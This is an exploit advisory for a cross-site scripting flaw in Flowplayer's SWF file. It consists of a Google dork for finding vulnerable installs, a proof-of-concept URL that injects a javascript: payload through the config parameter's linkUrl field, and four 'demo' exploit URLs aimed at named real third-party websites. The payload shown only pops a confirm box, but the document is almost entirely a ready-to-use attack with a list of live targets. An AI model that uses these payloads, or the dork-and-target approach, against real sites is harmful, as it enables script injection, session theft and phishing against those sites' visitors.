# Flowplayer (js & swf) XSS Vulnerability
# Date: 15/5/14
# Vulnerability Risk: High
# Vulnerable Software: http://flowplayer.org/
# Dork : inurl:flowplayer/flowplayer.swf
# Author: Muhammad Adeel aka Innoxent Stoker
# Founder | Urdusecurity.blogspot.com

# Vulnerability

XSS (Cross-Site Scripting) is a vulnerability in which attacker-supplied script
is executed in the context of either the web server's pages or its clients. It is
a highly dangerous class of vulnerability because it may lead to data theft and
similar attacks.

# POC & Exploit

The XSS is in the `config` parameter of flowplayer.swf: the value of the "linkUrl"
field inside the JSON config is used as a link target, and a `javascript:` URL
supplied there is executed in the origin of the site hosting the SWF.


http://Vulnerablesite.com/flowplayer.swf?config={"clip":{"url":"
http://stream.flowplayer.org/bauhaus/624x260.mp4",
"linkUrl":"javascript:confirm(String.fromCharCode(88,83,83));"}}&.swf


# Demo

http://www.advancementprojectca.org/sites/all/modules/flowplayer/flowplayer/flowplayer.swf?config={
"clip":{"url":"http://stream.flowplayer.org/bauhaus/624x260.mp4",
"linkUrl":"javascript:confirm(String.fromCharCode(88, 115, 115, 32, 80,
111, 99, 32, 47, 32, 77, 117, 104, 97, 109, 109, 97, 100, 32, 65, 100, 101,
101, 108, 32, 97, 107, 97, 32, 73, 110, 110, 111, 120, 101, 110, 116, 32,
83, 116, 111, 107, 101, 114, 32, 47, 47, 32, 85, 114, 100, 117, 83, 101,
99));"}}&.swf


http://www.dancelessonsaustin.com/template/fredwoodlands/js/flowplayer/flowplayer.swf?config={%22clip%22:{%22url%22:%22http://stream.flowplayer.org/bauhaus/624x260.mp4%22,%20%22linkUrl%22:%22javascript:confirm%28String.fromCharCode%2888,%20115,%20115,%2032,%2080,%20111,%2099,%2032,%2047,%2032,%2077,%20117,%20104,%2097,%20109,%20109,%2097,%20100,%2032,%2065,%20100,%20101,%20101,%20108,%2032,%2097,%20107,%2097,%2032,%2073,%20110,%20110,%20111,%20120,%20101,%20110,%20116,%2032,%2083,%20116,%20111,%20107,%20101,%20114,%2032,%2047,%2047,%2032,%2085,%20114,%20100,%20117,%2083,%20101,%2099%29%29;%22}}&.swf


http://www.tier1personnel.com/template/default/js/flowplayer/flowplayer.swf?config={%22clip%22:{%22url%22:%22http://stream.flowplayer.org/bauhaus/624x260.mp4%22,%20%22linkUrl%22:%22javascript:confirm%28String.fromCharCode%2888,%20115,%20115,%2032,%2080,%20111,%2099,%2032,%2047,%2032,%2077,%20117,%20104,%2097,%20109,%20109,%2097,%20100,%2032,%2065,%20100,%20101,%20101,%20108,%2032,%2097,%20107,%2097,%2032,%2073,%20110,%20110,%20111,%20120,%20101,%20110,%20116,%2032,%2083,%20116,%20111,%20107,%20101,%20114,%2032,%2047,%2047,%2032,%2085,%20114,%20100,%20117,%2083,%20101,%2099%29%29;%22}}&.swf


https://housing.wwu.edu/include/flowplayer/flowplayer.swf?config={%22clip%22:{%22url%22:%22http://stream.flowplayer.org/bauhaus/624x260.mp4%22,%20%22linkUrl%22:%22javascript:confirm%28String.fromCharCode%2888,%20115,%20115,%2032,%2080,%20111,%2099,%2032,%2047,%2032,%2077,%20117,%20104,%2097,%20109,%20109,%2097,%20100,%2032,%2065,%20100,%20101,%20101,%20108,%2032,%2097,%20107,%2097,%2032,%2073,%20110,%20110,%20111,%20120,%20101,%20110,%20116,%2032,%2083,%20116,%20111,%20107,%20101,%20114,%2032,%2047,%2047,%2032,%2085,%20114,%20100,%20117,%2083,%20101,%2099%29%29;%22}}&.swf